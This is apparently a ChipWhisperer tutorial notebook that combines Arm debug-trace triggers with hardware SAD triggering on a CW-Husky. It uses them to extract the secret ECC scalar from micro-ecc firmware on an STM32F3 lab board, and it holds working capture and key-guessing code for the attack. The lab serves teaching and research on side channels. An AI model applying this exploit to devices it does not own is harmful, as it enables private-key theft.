# Breaking Software ECC with TraceWhisperer *and* SAD

## Background

The [uecc_part1_trace.ipynb](uecc_part1_trace.ipynb) notebook was written to show how to find and exploit side-channel leakage in the [micro-ecc library](https://github.com/newaetech/chipwhisperer/tree/develop/hardware/victims/firmware/crypto/micro-ecc) library using Arm trace and [TraceWhisperer](https://github.com/newaetech/tracewhisperer).

Most of what makes that notebook long is dealing with the jitter that's inherent to trace.

While it's not explicitely presented as such, the notebook essentially deals with the jitter by using SAD (Sum of Absolute Differences) to re-align the traces. There, the SADs are computed in software. But Husky can do SAD in hardware (and it's *much* faster than software-based SAD).

At the time that uecc_part1_trace.ipynb was written, it wasn't possible to combine trace and SAD. But with the addition of sequenced triggers, it is now.

The [uecc_part2_notrace.ipynb](uecc_part2_notrace.ipynb) notebook already showed a successful attack using SAD. So why this notebook? The answer is that combining trace and SAD **simplifies** the attack:

1. **Combining trace and SAD allows us to deal with jitter much more easily than what we had to do in part 1.**
2. **Combining trace and SAD makes SAD much easier to tune than it was in part 2.**

This notebook and the original uecc_part1_trace.ipynb are similar and independent of one another, but uecc_part1_trace.ipynb has more explanations on the attack and the setting up of trace. It also explores leakage at various points, whereas this notebook focuses on just one area of leakage.

Finally, while uecc_part1_trace.ipynb can be run with ChipWhisperer-Pro and PhyWhisperer (running TraceWhisperer FW), this notebook **requires** CW-Husky (for its sequenced trigger capability).

## Supported Hardware

This tutorial requires CW-Husky; it is written for the STM32F3 target, but it could be ported to other Arm targets, as long as they contain an ETM module (which our SAM4S target, sadly, does not).

In [None]:
PLATFORM = 'CW308_STM32F3'
TRACE_INTERFACE = 'swo'
SCOPETYPE = 'OPENADC'

# not supported by this notebook, but can be made to work:
#PLATFORM = 'CW308_K82F'
#TRACE_INTERFACE = 'parallel'

In [None]:
import chipwhisperer as cw

In [None]:
# platform setup:
scope = cw.scope()
%run "../../Setup_Scripts/Setup_Generic.ipynb"
scope.trace.target = target
trace = scope.trace
scope.clock.clkgen_freq = 10e6
scope.clock.clkgen_src = 'system'
scope.clock.adc_mul = 1
scope.gain.setGain(19)
target.baud = 38400 * 10 / 7.37

In [None]:
trace.enabled = True
trace.clock.clkgen_enabled = True

In [None]:
scope.adc.samples = 6000000
scope.adc.stream_mode = True

### Program STM32 target:

**Warning**: if you make any changes to the target firmware (including compiler version and switches), there is a chance that the attack parameters used in this notebook won't work for you anymore. So, for your first run-through, stick with the provided binary.

But, making changes to the target firmware is a great way to learn how to use TraceWhisperer, so once you've had success with the default bitfile, do go ahead and try some changes! In fact the TraceWhisperer should make it easier to port the attack.

In [None]:
#%%bash -s "$PLATFORM"
#cd ../../../firmware/mcu/simpleserial-ecc
#make PLATFORM=$1 CRYPTO_TARGET=MICROECC

In [None]:
fw_path = '../../../firmware/mcu/simpleserial-ecc/simpleserial-ecc-{}.hex'.format(PLATFORM)

In [None]:
if (PLATFORM == 'CW308_STM32F3') or (PLATFORM == 'CWLITEARM'):
    prog = cw.programmers.STM32FProgrammer
    cw.program_target(scope, prog, fw_path)

In [None]:
reset_target(scope)

In [None]:
# target info and buildtimes:
print(trace.phywhisperer_name())
print(trace.get_fw_buildtime())
print(scope.fpga_buildtime)

### Set SWO operation mode:

Arm processors which support JTAG and SWD come out of reset in JTAG mode. In order to get trace data out of the SWO pin, we need to switch it over to SWD mode.

The `jtag_to_swd()` call below runs a special sequence on the TMS and TCK pins to do this switchover. However, different processors may have *additional* requirements to enable the SWO pin. The `simpleserial-trace` firmware handles this for our STM32 target.

Another sure-fire way to get a target into SWD mode is to use an external debugger. In that case, do not call `jtag_to_swd()`, as this could result in contention on the TMS/TCK pins, but do call `trace.set_trace_mode()`, because Husky still needs to know that the target is in SWO mode.

This table shows the jumper cables that you need to connect between Husky and the target:

| ChipWhisperer | Target     |
|     :-:       |    :-:     |
|      D0       |    TMS     |
|      D1       |    TCK     |
|      D2       |    TDO     |


In [None]:
if TRACE_INTERFACE == 'swo':
    trace.clock.fe_clock_src = 'target_clock'
    assert trace.clock.fe_clock_alive, "Hmm, the clock you chose doesn't seem to be active."
    trace.trace_mode = 'SWO'
    trace.jtag_to_swd() # switch target into SWO mode

    # Now the complicated bit:
    acpr = 0
    trigger_freq_mul = 8
    trace.clock.swo_clock_freq = scope.clock.clkgen_freq * trigger_freq_mul
    trace.target_registers.TPI_ACPR = acpr
    trace.swo_div = trigger_freq_mul * (acpr + 1)
    assert trace.clock.swo_clock_locked, "Trigger/UART clock not locked"
    assert scope.userio.status & 0x4, "SWO line not high"

else:
    print("Not supported in this notebook. See TraceWhisperer.ipynb to see how to set this up.")

In [None]:
scope.clock.reset_adc()
time.sleep(0.2)
assert (scope.clock.adc_locked), "ADC failed to lock"

#### Check that the target is alive:
If `get_fw_buildtime()` produces no output, the target may have become unresponsive after the above changes; it may simply require a reset.

In [None]:
reset_target(scope)
print(trace.get_fw_buildtime())

### Trigger trace capture from target FW:
(refer to [uecc_part1_trace.ipynb](uecc_part1_trace.ipynb) for explanations on what this does)

In [None]:
scope.trigger.module = 'basic'
scope.trigger.triggers = 'tio4'
trace.capture.trigger_source = 'firmware trigger'
trace.capture.raw = False

# match on any PC match (isync) trace packet:
trace.set_pattern_match(0, [3, 8, 32, 0, 0, 0, 0, 0], [255, 255, 255, 0, 0, 0, 0, 0])

# enable matching rule:
trace.capture.rules_enabled = [0]

trace.capture.mode = 'while_trig'

TRACES = 'HARDWARE'
%run "ECC_capture.ipynb"

trace.target_registers.DWT_CTRL = '40000021'

One thing we do different from uecc_part1_trace.ipynb is that we'll only look at one PC address match: the start of the `XYcZadd()` function.

In [None]:
trace.set_isync_matches(addr0=0, addr1=0x080011bc, match=1)

In [None]:
import random
def new_point():
    tries = 100
    for i in range(tries):
        x = random.getrandbits(256)
        y = curve.y_recover(x)
        if y:
            return (x,y)
    raise ValueError('Failed to generate a random point')

We begin the attack by collecting a single trace of the full target operation. We'll use a $k$ with alternating ones/zeros to make things easier for us later:

In [None]:
kr = 0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
k = input_k(kr)
Px, Py = new_point()

trace.arm_trace()
ptrace = capture_ecc_trace(k, Px, Py)
while trace.fifo_empty(): pass
raw = trace.read_capture_data()

Then we get the trace match event timestamps; there should be 255, because that's the number of iterations in the target's main loop:

In [None]:
times_p2 = trace.get_rule_match_times(raw, rawtimes=False, verbose=False)
assert len(times_p2) == 255

Let's overlay plot all the power trace segments using the debug trace timestamps.

If we're lucky, we may see nice alignment for part of the capture, but this depends on how jittery the target's trace module is feeling at the moment(!):

In [None]:
start = -200
samples = 200
from bokeh.palettes import inferno
from bokeh.plotting import figure, show
from bokeh.resources import INLINE
from bokeh.io import output_notebook
from bokeh.models import Span, Legend, LegendItem
import itertools
output_notebook(INLINE)
B = figure(width=1800)
colors = itertools.cycle(inferno(255))
for i in range(255):
    B.line(list(range(samples)), ptrace.wave[times_p2[i][0]+start:times_p2[i][0]+start+samples], color=next(colors))
show(B)

In case of bad jitter, here's just one trace segment.

In [None]:
samples = 200
start = -200
s = figure(width=2000)
i1 = 127
s.line(list(range(samples)), ptrace.wave[times_p2[i1][0]+start:times_p2[i1][0]+start+samples], line_color='blue')
#s.line(range(samples), ptrace.wave[times_p2[i2][0]+start:times_p2[i2][0]+start+samples], line_color='red')
show(s)

When the trace jitter doesn't act up, what we find is alignment across the power trace segments from sample ~40 to ~170; YMMV due to jitter, but what you're looking for is a series of 7 equidistant narrow peaks:
![7_narrow_peaks](img/uecc_7narrow_peaks.png)


If you spend some time studying the power trace, you'll see that this is a particularly nice distinct pattern in the power trace that's probably a pretty good candidate for a SAD reference (spoiler: it is).

But there's one small problem: notice how we have indexed into the full power trace 200 samples *before* the trace trigger (i.e. see the `start = -200` above)?

Remember our goal is to sequence two triggers: first the trace trigger brings us in the vicinity of the leakage we wish to exploit (+/- some jitter), then a SAD trigger shortly after the trace trigger eliminates the jitter. The key word here is **after**: we can't use the 7 narrow peaks for SAD if they come *before* the trace trigger!

What to do? Well, with trace with can trigger on *any* PC address; what if we trace trigger a little bit earlier?

Recall that here we were triggering on the start of the `XYcZ_add()` function. Examine the source disassembly, let's move the PC trigger to the previous function call, which is the call to `uECC_vli_set()` that's done at the end of `XYcZ_addC()`. Let's see what happens:

In [None]:
trace.set_isync_matches(addr0=0, addr1=0x08000e12, match=1)

In [None]:
trace.arm_trace()
ptrace = capture_ecc_trace(k, Px, Py)
while trace.fifo_empty(): pass
raw = trace.read_capture_data()

In [None]:
# convert debug traces into timestamps:
times_p2 = trace.get_rule_match_times(raw, rawtimes=False, verbose=False)
assert len(times_p2) == 256

We get 256 PC match events -- that's good.

Overlaying all the trace segments, there seems to be more jitter, and our 7 narrow peaks are harder to locate:

In [None]:
start = 0
samples = 1000
B = figure(width=1800)
colors = itertools.cycle(inferno(255))
for i in range(255):
    B.line(list(range(samples)), ptrace.wave[times_p2[i][0]+start:times_p2[i][0]+start+samples], color=next(colors))
show(B)

But if we plot just a few (or, in the worst case, just one) trace segments, then we should easily locate the 7 peaks near index 500:

In [None]:
samples = 1000
start = 0
s = figure(width=2000)
# unless you're lucky you'll likely need to try different indices until you get synchronized traces:
i1 = 127
i2 = 5
i3 = 200
s.line(list(range(samples)), ptrace.wave[times_p2[i1][0]+start:times_p2[i1][0]+start+samples], line_color='blue')
#s.line(list(range(samples)), ptrace.wave[times_p2[i2][0]+start:times_p2[i2][0]+start+samples], line_color='red')
s.line(list(range(samples)), ptrace.wave[times_p2[i3][0]+start:times_p2[i3][0]+start+samples], line_color='green')
show(s)

Let's establish our SAD reference. Zoom in to gather good indices.

We'll use a 96-sample SAD reference.

*(Side note: why 96? It's historical... When this notebook was originally developed, we were limited to setting the SAD reference to 192 or 96 samples. Now Husky SAD is much more flexible and we can set the refence to any number of samples (up to scope.SAD.sad_reference_length), but we'll stay with the original 96 samples.)*


Because of the trace jitter, you may need to adjust these numbers. Typically, either 510 or 570 is a good stop point. **Make sure to not go more than 50 samples beyond the end of the 7 peaks.**

In [None]:
segment = i1
#stop = 510
stop = 570
start = stop-96

ref_trace = ptrace.wave[times_p2[segment][0]+start:times_p2[segment][0]+start+scope.SAD.sad_reference_length*2]

In [None]:
s = figure(width=2000)
s.line(list(range(96)), ref_trace[:96])
show(s)

**If you don't see the 7 peaks, try the "other" value for `stop` (510 or 570).**

Recall that our eventual goal is to do a sequenced trace+SAD capture, but let's build that one step at a time.

First, let's do a SAD-triggered capture only (without trace). This is helpful for establishing a good SAD threshold value.

Instead of capturing the full target operation, we'll use Husky's segmented capture feature, to capture `scope.adc.samples` every time the SAD trigger fires (which we expect it to do 256 times, ideally).

In [None]:
scope.trigger.module = 'SAD'
scope.SAD.trigger_sample = 96
scope.SAD.reference = ref_trace

We have to explicitely tell the SAD module that it can fire multiple times; additionally, we set `scope.SAD.always_armed` so that it keeps firing even after the capture is done.

Without this, the SAD module would stop firing after the capture is complete (e.g. after it's fired `scope.adc.segments` times). This way, we can find out whether it's firing too few times or too many times (instead of inferring it from the quality of the traces, or whether the attack works or not).

We'll also set some threshold values that we'll fine-tune later:

In [None]:
scope.SAD.multiple_triggers = True
scope.SAD.always_armed = True
scope.SAD.threshold = 10
scope.SAD.interval_threshold = 10

In [None]:
scope.adc.stream_mode = False
scope.adc.segment_cycle_counter_en = False
scope.adc.segments = 255

Again we'll use `SADExplorer` to help tune the thresholds:

In [None]:
explorer = cw.SADExplorer(scope, target, ref_trace, 0, max_segments=255, capture_function=lambda: capture_ecc_trace(k, Px, Py))

Unlike in uecc_part2_notrace.ipynb, where we aimed to tune the thresholds to get exactly 255 matches, here we are ok to get many more matches. As long as you get < 4000 matches, you should be good.

Make sure that the 7 peaks of our SAD reference are clear. *(hint: you'll likely need to reduce the SAD thresholds; "trigger too soon" errors are ok and expected here)*

**This is the power of sequencing triggers!**

Why? Because the next step is to sequentially trigger from SAD *within a small time window* after the trace trigger.

If you don't get between 255 and 4000 triggers, adjust the thresholds until you do; if that doesn't work, make sure your SAD reference is appropriate.

In [None]:
if 255 < scope.SAD.num_triggers_seen < 4000:
    print('Looks good! Got %d triggers. ✅' % scope.SAD.num_triggers_seen)
else:
    print('❌ Got %d triggers; try again.' % scope.SAD.num_triggers_seen)

### Next: let's do a just trace-triggered segmented capture, without SAD.

At the start of this notebook, we used trace, but the scope capture itself was triggered by IO4.

Now we set up the trace module to emit the capture trigger. This will be the first trigger of our trigger sequence, so let's make sure we can get it to fire as expected.

In [None]:
scope.trigger.module = 'trace'
trace.capture.trigger_source = 0
trace.capture.mode = 'count_cycles'
trace.capture.count = int(7e6)
trace.capture.max_triggers = 256

In [None]:
trace.arm_trace()
ptrace = capture_ecc_trace(k, Px, Py)

In [None]:
while trace.fifo_empty(): pass
raw = trace.read_capture_data()

In [None]:
# convert debug traces into timestamps:
times_p2 = trace.get_rule_match_times(raw, rawtimes=False, verbose=False)
assert len(times_p2) == 256

You can plot the segments out of curiosity, but they won't align nicely due to the jitter:

In [None]:
samples = scope.adc.samples
B = figure(width=1800)
colors = itertools.cycle(inferno(255))
for i in range(255):
    B.line(list(range(samples)), ptrace.wave[i*samples:(i+1)*samples], color=next(colors))
show(B)

## Finally, we are ready to set up the trigger sequencer:

Now we add the second trigger to our trigger sequence, the SAD trigger. All we need to do is:

In [None]:
scope.trigger.sequencer_enabled = True
scope.trigger.module[0] = 'trace'
scope.trigger.module[1] = 'SAD'

A powerful feature of sequenced triggering is that we can optionally specify the allowed time delta between the first and second triggers.

Minimum and maximum deltas can be specified; if the second trigger occurs outside of this time window, then it is ignored.

Our reference trace was taken to end 510 samples after the trace trigger (you may have used a different value: if so, adjust the window accordingly).

In the case of the SAD trigger, it's important to know that the SAD trigger actually fires `scope.SAD.latency` cycles *after* the end of the SAD pattern (`scope.SAD.latency` can vary as the design and capture hardware evolves).

Additionally, if you ran uecc_part1_trace.ipynb then you know that trace jitter is on the order of +/-70 clock cycles.

Taking all this into account, we can expect the SAD trigger to fire in the range of `510 + scope.SAD.trigger_sample + scope.SAD.latency +/- 70` cycles.

Finally, while the SAD trigger fires at the end of the SAD pattern match, it must be enabled when the pattern started, and so the start of the window should be shifted back by `scope.SAD.sad_reference_length` , plus a bit more margin on either side.

In [None]:
margin = 100
scope.trigger.window_start = 510 + scope.SAD.latency - 70 - margin
scope.trigger.window_end = 570 + scope.SAD.latency + scope.SAD.trigger_sample + 70 + margin

If you have a logic analyzer it can be helpful for tuning the trigger sequencer parameters.

For this notebook, this should not be necessary at all, since there is lots of guidance for setting the proper triggering parameters. However, it can come in very handy when you're building a trigger sequence from scratch, so it's good to know that this is available.

In [None]:
scope.userio.mode = 'swo_trace_plus_debug'
scope.userio.fpga_mode = 14

Husky's USERIO port pulls double duty here: pins D0, D1, and D2 are connected to the target (to obtain the debug trace data); connect the remaining pins (D3-D7) to your logic analyzer.

Printing the `scope.userio` object tells you the definition of each USERIO pin:

In [None]:
scope.userio

- `D3/trigger[0]` is the first trigger in the trigger sequence (trace)
- `D4/trigger[1]` is the second trigger (SAD)
- `D5/trigger 0 window`: when this is high, the trigger sequencer is waiting for the first trigger; it goes low when the trigger is received
- `D6/trigger 1 window`: when this is high, the trigger sequencer is waiting for the second trigger; it goes low when the trigger is received, or its expected window expires
- `D7/too late` pulses if the second trigger is not received by the end of its window

***Important note**: if you connect a logic analyzer to the USERIO D3-D7 pins, be sure to connect several ground lines between the logic analyzer and Husky. The internal trigger signals are narrow single-cycle pulses, and less-than-ideal connections can actually mess up their proper functioning inside the FPGA (i.e. this can cause the capture that follows to fail). If you suspect this is a problem (i.e. you can't get the sequence-triggered capture to work), try unconnecting D3-D7, and set `scope.userio.mode` back to `'trace'`.*

Now we're ready to capture. Some tuning of `scope.SAD.threshold` may still be necessary here; if anything, you **may** find that you need to set the threshold a fair bit higher.

This is ok because `scope.trigger.window_start` and `scope.trigger.window_end` prevent the SAD trigger from firing when it's not supposed to.

Note that we no longer need to capture trace data; we're only using trace to generate the first trigger in our sequence:

In [None]:
trace.capture.mode = 'off'

We can also turn this off, since SAD will only be allowed to fire in our specified window anyhow:

In [None]:
scope.SAD.always_armed = False

The moment of truth: let's see if our sequenced trigger capture works:

In [None]:
# cross your fingers...
trace.arm_trace()
seqtrace = capture_ecc_trace(k, Px, Py)
assert scope.SAD.num_triggers_seen == 255, 'Got %d SAD triggers' % scope.SAD.num_triggers_seen

In [None]:
# convert debug traces into timestamps:
times_p2 = trace.get_rule_match_times(raw, rawtimes=False, verbose=False)
assert len(times_p2) == 256

It shouldn't be possible to get too many triggers (because now the SAD can only trigger after the trace trigger), but you may get too few; if so, tweak `scope.SAD.threshold` and/or `scope.SAD.interval_threshold` until you get the right number.

Once you do get the right number, let's check whether the time deltas between successive triggers is within the accepted range:

In [None]:
ttimes = scope.trigger.get_trigger_times()
assert len(ttimes) == 254
assert 20000 < min(ttimes) < 23000
assert 20000 < max(ttimes) < 23000

In [None]:
len(ttimes), min(ttimes), max(ttimes), np.average(ttimes)

If you're getting out-of-range trigger times, it's likely that you've swung too far on `scope.SAD.threshold` and/or `scope.SAD.interval_threshold`; reduce until you get 255 SAD triggers that are all in the expected time range.

If we now overlay the power trace segments, we should find perfect alignment. Compare this with the jittery trace-triggered power trace segments!

**If you don't have perfect alignment, it's likely that your SAD threshold is too high: it's very important to fix this before proceeding any further.**

In [None]:
samples = scope.adc.samples
B = figure(width=1800)
colors = itertools.cycle(inferno(255))
for i in range(255):
    B.line(list(range(samples)), seqtrace.wave[i*samples:(i+1)*samples], color=next(colors))
show(B)

All the hard work is done now!

We have rock-steady, jitter-free captures around where we expect to find leakage, so all that's left to do is find the leakage and exploit it.

As in uecc_part1_trace.ipynb, we'll capture a few traces using a constant $k$, calculate the average trace segment for $k$ bits that are 0 and for $k$ bits that are one, and hope to find a consistant difference.

While we've tuned our SAD parameters for a single capture, power traces are noisy so it's possible that some captures don't work out. But we can detect this and discard bad traces, instead of letting them pollute our trace set.

In [None]:
trace.capture.use_husky_arm = True # this saves us from have to arm the scope *and* the trace module separately

We'll increase our `presamples` to ensure we grab the area where leakage is present:

In [None]:
scope.adc.presamples = scope.SAD.trigger_sample + scope.SAD.latency + 100
scope.adc.samples = scope.adc.presamples + 9 + (3 - (scope.adc.presamples%3)) # must be a multiple of 3

In [None]:
traces = 30

from tqdm.notebook import tnrange

ptraces = []

# acquire power and debug traces:
for t in tnrange(traces, desc='Capturing traces'):
    Px, Py = new_point()
    #trace.arm_trace() # don't actually need trace data; just its trigger!
    ptrace = capture_ecc_trace(k, Px, Py)
    # make sure it's a "good" trace:
    if scope.SAD.num_triggers_seen != 255:
        print('Got %d SAD triggers; skipping this one.' % scope.SAD.num_triggers_seen)
        continue
    ttimes = scope.trigger.get_trigger_times()
    if not ((20000 < min(ttimes) < 23000) and (20000 < max(ttimes) < 23000)):
        print('ttimes out of spec: min=%d, max=%d; skipping this one.' % (min(ttimes), max(ttimes)))
        continue
    ptraces.append(ptrace)


A few failed captures is ok, but if you get a lot it's best to fix that by tweaking the SAD thresholds before proceeding.

In [None]:
assert len(ptraces) > 25, 'got only %d traces ' % len(ptraces)

## Compute the average ones and zeros:

We now take the same approach from part 1 and part 2 to find the leakage and carry out the attack:

In [None]:
samples = scope.adc.samples

avg_trace = np.zeros(samples)

for t in ptraces:
    for i in range(1,255):
        avg_trace += t.wave[i*samples:(i+1)*samples]

avg_trace /= (255*len(ptraces))

In [None]:
avg_ones = np.zeros(samples)
avg_zeros = np.zeros(samples)

for t in ptraces:
    for i in range(254):
        if i%2:
            avg_ones += t.wave[i*samples:(i+1)*samples]
        else:
            avg_zeros += t.wave[i*samples:(i+1)*samples]

avg_ones /= (127*len(ptraces))
avg_zeros /= (127*len(ptraces))

In [None]:
s = figure(width=2000)

xrange = list(range(len(avg_trace)))
#s.line(xrange, avg_trace-50, line_color="black")
s.line(xrange, avg_ones-50, line_color="red")
s.line(xrange, avg_zeros-50, line_color="blue")
s.line(xrange, (avg_ones - avg_zeros)*100, line_color="orange")

show(s)

The figure below shows the leakage that you should find: the tall positive peak and less tall negative peak, about 40 samples (+/- jitter) before the series of 7 narrow peaks.

If you don't see this, it may be that you need to increase `scope.adc.presamples`. (This could happen due to the trace jitter.)

![poi11](img/uecc_seqtrig_leakage.png)


As in uecc_part1_trace.ipynb, we extract those peaks to form our list of "points of interest":

In [None]:
# if using a different target, adjust as needed:
START=0
STOP=300
PTHRESH = 50/100
NTHRESH = 30/100

In [None]:
poi = list(np.where((avg_ones[START:STOP] - avg_zeros[START:STOP]) > PTHRESH)[0] + START)
poi.extend(list(-(np.where((avg_ones[START:STOP] - avg_zeros[START:STOP]) < -NTHRESH)[0] + START)))
print(poi)

In [None]:
assert 5 < len(poi) < 10, "hmm poi doesn't look quite right, adjust your settings and try again"

In [None]:
def calc_sumdata(poi, ptraces, trim=None):
    if trim:
        samples = trim
    else:
        samples = scope.adc.samples
    sumdata = np.zeros(255)
    for i in range(255):
        for t in ptraces:
            for p in poi:
                sample = t.wave[i*samples+abs(p)]
                if p >= 0:
                    sumdata[i] += sample
                else:
                    sumdata[i] -= sample
    return sumdata/len(ptraces)


And now we find whether we can recognize $kr$:

In [None]:
sd = calc_sumdata(poi, ptraces)

s = figure(width=2000)

xrange = list(range(len(sd)))
s.line(xrange, sd, line_color="red", line_width=2)

show(s)

You should get something that looks like this:

![poi11](img/uecc_0xaaaa.png)

## Now we can **attack!**

We use a random $k$ and see whether we can correctly guess this $k$ from the power trace, using our `poi`.

In [None]:
k = random_k()
kr = regularized_k(k)
hex(k), hex(kr)

In [None]:
traces = 30

from tqdm.notebook import tnrange
ptraces = []
# acquire power and debug traces:
for t in tnrange(traces, desc='Capturing traces'):
    Px, Py = new_point()
    #trace.arm_trace() # don't actually need trace data; just its trigger!
    ptrace = capture_ecc_trace(k, Px, Py)
    # make sure it's a "good" trace:
    if scope.SAD.num_triggers_seen != 255:
        print('Got %d SAD triggers; skipping this one.' % scope.SAD.num_triggers_seen)
        continue
    ttimes = scope.trigger.get_trigger_times()
    if not ((20000 < min(ttimes) < 23000) and (20000 < max(ttimes) < 23000)):
        print('ttimes out of spec: min=%d, max=%d; skipping this one.' % (min(ttimes), max(ttimes)))
        continue
    ptraces.append(ptrace)

In [None]:
assert len(ptraces) > 25, 'Need more traces! (got %d)' % len(ptraces)

In [None]:
sd = calc_sumdata(poi, ptraces)

s = figure(width=2000)

xrange = list(range(len(sd)))
s.line(xrange, sd, line_color="red", line_width=2)
show(s)

You should get a fairly well-defined train of high and low values, without any points that are too close to the middle.

In [None]:
def attack(poi, straces, trim=None, verbose=True):
    sd = calc_sumdata(poi, straces, trim=trim)

    # guess all bits from waveform:
    guess = ''
    for i in range(1,255):
        if sd[i] > np.average(sd):
            guess += '0'
        else:
            guess += '1'

    # first and last bit are unknown, so enumerate the possibilities:
    guesses = []
    for first in (['0', '1']):
        for last in (['0', '1']):
            guesses.append(int(first + guess + last, 2))

    kr = regularized_k(k)
    wrong_bits = []
    if kr in guesses:
        if verbose: print('✅ Guessed right!')
    else:
        for kbit in range(1,254):
            if int(guess[kbit-1]) != ((kr >> (255-kbit)) & 1):
                wrong_bits.append(255-kbit)
        if verbose:
            print('Attack failed.')
            print('Guesses: %s' % hex(guesses[0]))
            print('         %s' % hex(guesses[1]))
            print('         %s' % hex(guesses[2]))
            print('         %s' % hex(guesses[3]))
            print('Correct: %s' % hex(kr))
            print('%d wrong bits' % len(wrong_bits))
    return wrong_bits

The moment of truth:

In [None]:
attack(poi, ptraces)

Let's see how many traces are needed to correctly guess the key:

In [None]:
for attack_traces in range(1, len(ptraces)+1):
    print('Attacking with %d traces... ' % attack_traces,  end='')
    wrong_bits = attack(poi, ptraces[:attack_traces], None, False)
    if wrong_bits:
        print('failed, %d wrong bits' % len(wrong_bits))
    else:
        print('passed ✅')

The attack should succeed with as few as 15 traces; what's even more impressive is that most bits are guessed correctly with just a single trace.